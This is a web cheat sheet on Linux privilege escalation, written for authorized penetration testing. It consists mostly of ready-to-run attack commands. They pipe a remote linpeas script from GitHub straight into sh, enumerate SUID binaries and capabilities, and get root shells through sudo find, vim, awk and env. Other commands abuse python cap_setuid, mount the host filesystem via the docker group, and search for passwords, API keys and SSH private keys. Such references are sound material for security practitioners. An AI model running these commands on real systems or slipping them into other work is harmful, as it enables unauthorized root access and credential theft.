CyberCheatsheets

Linux Privilege Escalation Cheat Sheet

Enumeration and escalation paths to go from a low-privilege shell to root on Linux during authorized engagements.

Exploitation & Payloadsenumerationlinuxpost-exploitationprivescsuidUpdated 2026-06-17

Overview

Linux privilege escalation is about finding a misconfiguration, weak permission, or vulnerable binary that lets a low-privileged user run code as a higher-privileged one (usually root). The workflow is always the same: enumerate thoroughly, identify the weakest path, then exploit it. Start with automated enumeration (linpeas) but always confirm findings manually—GTFOBins is your reference for turning a binary into a shell.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

First: situational awareness

Current user, groups (look for sudo, docker, lxd, disk, adm)

id

Kernel version — pivot to kernel-exploit search if old

uname -a

Distro and version

cat /etc/os-release

Commands you can run as root WITHOUT a password — the #1 quick win

sudo -l

Host and network context

hostname; ip a; cat /etc/hosts

Automated enumeration

linpeas one-shot (pipe straight to sh if no disk write)

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Full (-a) scan, save output for review

wget -q https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/lp.sh && bash /tmp/lp.sh -a | tee /tmp/lp.out

LinEnum thorough mode (alternative)

./LinEnum.sh -t

SUID / SGID and capabilities

All SUID binaries — check each against GTFOBins

find / -perm -4000 -type f 2>/dev/null

All SGID binaries

find / -perm -2000 -type f 2>/dev/null

File capabilities — cap_setuid on python/perl = instant root

getcap -r / 2>/dev/null

Abuse cap_setuid+ep on python3

/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Only works if python3 has the setuid capability (confirm with getcap).

sudo abuse (GTFOBins)

Root shell via sudo find

sudo find . -exec /bin/sh \; -quit

Root shell via sudo vim

sudo vim -c ':!/bin/sh'

Root shell via sudo awk

sudo awk 'BEGIN {system("/bin/sh")}'

Root shell if sudo env is allowed

sudo env /bin/sh

Cron jobs

System cron — look for scripts you can write to

cat /etc/crontab; ls -la /etc/cron.*

Check for relative paths / writable dirs in cron PATH

grep -rnw '/etc' -e 'PATH' 2>/dev/null | grep -i cron

Writable files — cross-reference with any cron-run script

find / -writable -type f 2>/dev/null | grep -vE '^/proc|^/sys'

Quick one-liners

Spawn a fully interactive TTY (do this first on a raw shell)

python3 -c 'import pty;pty.spawn("/bin/bash")'

Find world-writable directories

find / -writable -type d 2>/dev/null

Look for passwords in config/history files

grep -riE 'password|passwd|secret|api[_-]?key' /home /var/www /etc 2>/dev/null | head

List internal listening services (pivot targets)

ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null

Find SSH private keys

find / -name 'id_rsa*' -o -name '*.pem' 2>/dev/null

Dangerous group memberships

Member of docker group = root (mount host fs)

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

adm group can read logs (creds, tokens)

find / -group adm -readable 2>/dev/null

Tips

  • Always run sudo -l first — password-less sudo is the fastest and most common path.
  • Every interesting SUID binary should be checked at GTFOBins before anything else.
  • Stabilize your shell with a PTY before running interactive tools (vim, ftp, sudo prompts).
  • Kernel exploits are a last resort — they're noisy and can crash the box.

References

Related cheat sheets